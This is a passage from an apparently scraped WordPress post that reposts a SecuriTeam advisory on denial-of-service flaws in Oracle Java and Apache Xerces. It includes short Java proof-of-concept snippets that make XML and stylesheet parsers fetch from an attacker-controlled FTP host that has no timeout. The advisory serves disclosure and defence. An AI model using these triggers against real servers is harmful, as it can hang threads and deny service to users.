class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-15\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-16\"><span 
class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p><strong>javax.swing.text.html.StyleSheet Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0ab081017809\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; 
-webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">import java.net.MalformedURLException;\nimport java.net.URL;\n\nimport javax.swing.text.html.StyleSheet;\n\npublic class ImportStyla {\n\n    public static void main(String[] args) {\n        StyleSheet cs = new StyleSheet();\n        URL url;\n        try {\n            url = new URL(&quot;ftp:\/\/maliciousftp:2121\/test&quot;);\n            cs.importStyleSheet(url);\n        } catch (MalformedURLException e) {\n            e.printStackTrace();\n        }\n    }\n}<\/textarea><\/div>\n<\/p><\/div>\n<p><strong>java.net.URLConnection &#8211; Concurrency-Related Denial of Service<\/strong><br \/> A thread-concurrency Denial of Service condition exists when java.net.URLConnection is used to fetch a file from an FTP server without specifying a connection timeout value.<\/p>\n<p>The vulnerable functions are:<\/p>\n<ul>\n<li>javax.xml.parsers.SAXParser<\/li>\n<li>javax.xml.parsers.SAXParserFactory<\/li>\n<li>org.dom4j.Document<\/li>\n<li>org.dom4j.io.SAXReader<\/li>\n<li>javax.xml.parsers.DocumentBuilder<\/li>\n<li>javax.xml.parsers.DocumentBuilderFactory<\/li>\n<\/ul>\n<p>The root cause in Apache Xerces is in com.sun.org.apache.xerces.internal.impl.XMLEntityManager.class.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-3.jpg\" data-slb-active=\"1\" data-slb-asset=\"511416042\" data-slb-internal=\"0\" data-slb-group=\"3271\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-3-300x119.jpg\" alt=\"\" width=\"300\" height=\"119\" class=\"alignnone size-medium wp-image-3274\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-3-300x119.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-3.jpg 610w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>In this case, XMLEntityManager.class does not explicitly set a connection timeout on the connect object, so Java falls back to a default value of -1, which leads to a Denial of Service condition, as explained below.<\/p>\n<p>Example of code using the Apache Xerces library to fetch an XML file from an FTP server:<\/p>\n<\/p>\n<div id=\"crayon-59a739de8f0ae035529858\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" 
data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">\/\/ [snip]\nprivate void parseXmlFile() {\n    \/\/ get the factory\n    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n    try {\n        \/\/ using the factory, get an instance of a document builder\n        DocumentBuilder db = dbf.newDocumentBuilder();\n        \/\/ parse using the builder to get a DOM representation of the XML file\n        dom = db.parse(&quot;ftp:\/\/maliciousftpserver\/test.xml&quot;); \/\/ FTP URL controlled by the attacker\n    } catch (ParserConfigurationException pce) {\n        pce.printStackTrace();\n    } catch (SAXException se) {\n        se.printStackTrace();\n    } catch (IOException ioe) {\n        ioe.printStackTrace();\n    }\n}\n\/\/ [snip]<\/textarea><\/div>\n<\/p><\/div>\n<p><strong>SAXParser Proof of Concept<\/strong><\/p>\n<div 
id=\"crayon-59a739de8f0b1068872417\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">SAXParserFactory factory = SAXParserFactory.newInstance();\nSAXParser saxParser = factory.newSAXParser();\n\/\/ UserHandler: handler class assumed to extend DefaultHandler (not shown on the page)\nUserHandler userhandler = new UserHandler();\nsaxParser.parse(&quot;ftp:\/\/badftpserver:2121\/whatever.xml&quot;, userhandler);<\/textarea><\/div>\n<\/p><\/div>\n<p><strong>DOM4J \/ SAXReader Proof of Concept<\/strong><\/p>\n<div id=\"crayon-59a739de8f0b4604365817\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">SAXReader reader = new SAXReader();\nDocument document = reader.read(&quot;ftp:\/\/badftpserver:2121\/whatever.xml&quot;);<\/textarea><\/div>\n<\/p><\/div>\n<p><strong>JAVAX XML Parsers Proof of Concept<\/strong><\/p>\n<div id=\"crayon-59a739de8f0b6808412738\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" 
title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> DocumentBuilder db = dbf.newDocumentBuilder();\t\t\t  dom = db.parse(&#8220;ftp:\/\/badftpserver:2121\/whatever.xml&#8221;);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0b6808412738-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0b6808412738-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0b6808412738-1\"><span class=\"crayon-e\">DocumentBuilder <\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dbf<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">newDocumentBuilder<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0b6808412738-2\"><span class=\"crayon-v\">dom<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/badftpserver:2121\/whatever.xml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3271\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1-300x198.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 30 Aug 2017 19:11:43 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Oracle Java JDK\/JRE (1.8.0.131 and previous versions) packages and Apache Xerces (2.11.0) The vulnerabilities are: Oracle JDK\/JRE Concurrency-Related Denial of Service java.net.URLConnection (with no setConnectTimeout) 
Concurrency-Related Denial of Service Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3271\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Oracle Java and Apache Xerces PDF\/Docx Server Side DoS<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10532,10757],"class_list":["post-9010","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-denial-of-service","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9010","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9010"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9010\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9010"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9010"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}